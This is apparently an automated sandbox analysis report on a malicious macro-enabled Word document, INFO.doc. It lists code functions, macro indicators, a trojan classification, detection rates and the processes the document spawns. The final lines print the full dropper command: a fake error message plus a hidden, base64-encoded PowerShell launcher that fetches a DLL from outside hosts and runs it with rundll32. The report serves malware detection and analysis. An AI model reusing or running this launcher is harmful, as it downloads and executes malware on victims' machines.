                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100112B37_2_100112B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E0B67_2_1001E0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000BEBD7_2_1000BEBD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100048C77_2_100048C7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004AD37_2_10004AD3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100068D87_2_100068D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100084D87_2_100084D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100042DE7_2_100042DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E4E17_2_1001E4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010CE07_2_10010CE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100038E17_2_100038E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012CE37_2_10012CE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A2E57_2_1001A2E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E8F67_2_1000E8F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001EF97_2_10001EF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006AFC7_2_10006AFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100073067_2_10007306
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CF077_2_1001CF07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003F0A7_2_10003F0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013F167_2_10013F16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100187217_2_10018721
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100197267_2_10019726
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C92D7_2_1001C92D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001732F7_2_1001732F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D5357_2_1000D535
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100163347_2_10016334
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014D397_2_10014D39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100037437_2_10003743
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F54C7_2_1000F54C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001894D7_2_1001894D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100109507_2_10010950
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011F547_2_10011F54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CB587_2_1001CB58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BF697_2_1001BF69
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007B6A7_2_10007B6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A16A7_2_1000A16A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019D6D7_2_10019D6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001197B7_2_1001197B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DD807_2_1001DD80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017B8D7_2_10017B8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B5987_2_1001B598
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001539F7_2_1001539F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000799F7_2_1000799F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E9A27_2_1001E9A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000EBA47_2_1000EBA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100021C07_2_100021C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C1C27_2_1001C1C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100107D37_2_100107D3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100095DD7_2_100095DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D5DF7_2_1001D5DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100129E37_2_100129E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F7EF7_2_1000F7EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100033F47_2_100033F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A7FA7_2_1000A7FA
                      Source: INFO.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Tvh1u8793dltn9, Function Document_openName: Document_open
                      Source: INFO.docOLE indicator, VBA macros: true
                      Source: rundll32.exe, 00000006.00000002.2102802733.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101866606.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113778647.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123455227.0000000001E70000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@16/8@5/7
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$INFO.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBFC5.tmpJump to behavior
                      Source: INFO.docOLE indicator, Word Document stream: true
                      Source: INFO.docOLE document summary: title field not present or empty
                      Source: INFO.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ........................................ .c.......c...............).......).............#...............................h.......5kU.......).....Jump to behavior
                      Source: C:\Windows\System32\msg.exeConsole Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......X.).....L.................).....Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......8.O.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......h...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... u...............u.............}..v....P.......0...............8.O.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................B..j......................u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................B..j......O...............u.............}..v............0.................O.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j......................u.............}..v....P.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j..... u...............u.............}..v............0.................O.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............b^.j.....IO...............u.............}..v.....X......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7................_.j....`Y................u.............}..v.....Y......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............b^.j.....IO...............u.............}..v.....`......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C................_.j....`a................u.............}..v.....a......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............b^.j.....IO...............u.............}..v.....h......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O................_.j....`i................u.............}..v.....i......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v.....m......0................EO.....(.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[................_.j.....n................u.............}..v....0o......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.3.1.............}..v....@s......0................EO.....$.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g................_.j.....s................u.............}..v....xt......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............b^.j.....IO...............u.............}..v....@{......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s................_.j.....{................u.............}..v....x|......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'................_.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3................_.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?................_.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K................_.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W................_.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............b^.j.....IO...............u.............}..v....@.......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c................_.j......................u.............}..v....x.......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............b^.j.....IO...............u.............}..v....@#......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o................_.j.....#................u.............}..v....x$......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............b^.j.....IO...............u.............}..v....@+......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{................_.j.....+................u.............}..v....x,......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....@3......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j.....3................u.............}..v....x4......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v.....9......0.......................r.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j.....:................u.............}..v.....;......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v.....A......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j....`B................u.............}..v.....B......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................b^.j.....IO...............u.............}..v....0H......0.......................r.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j.....H................u.............}..v....hI......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......b^.j.....IO...............u.............}..v.....L......0................EO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................._.j.....M................u.............}..v....0N......0...............XFO.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................u.............}..v............0.................O.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................u.............}..v....(4/.....0.................O.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                      Source: INFO.docVirustotal: Detection: 33%
                      Source: INFO.docMetadefender: Detection: 35%
                      Source: INFO.docReversingLabs: Detection: 26%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AM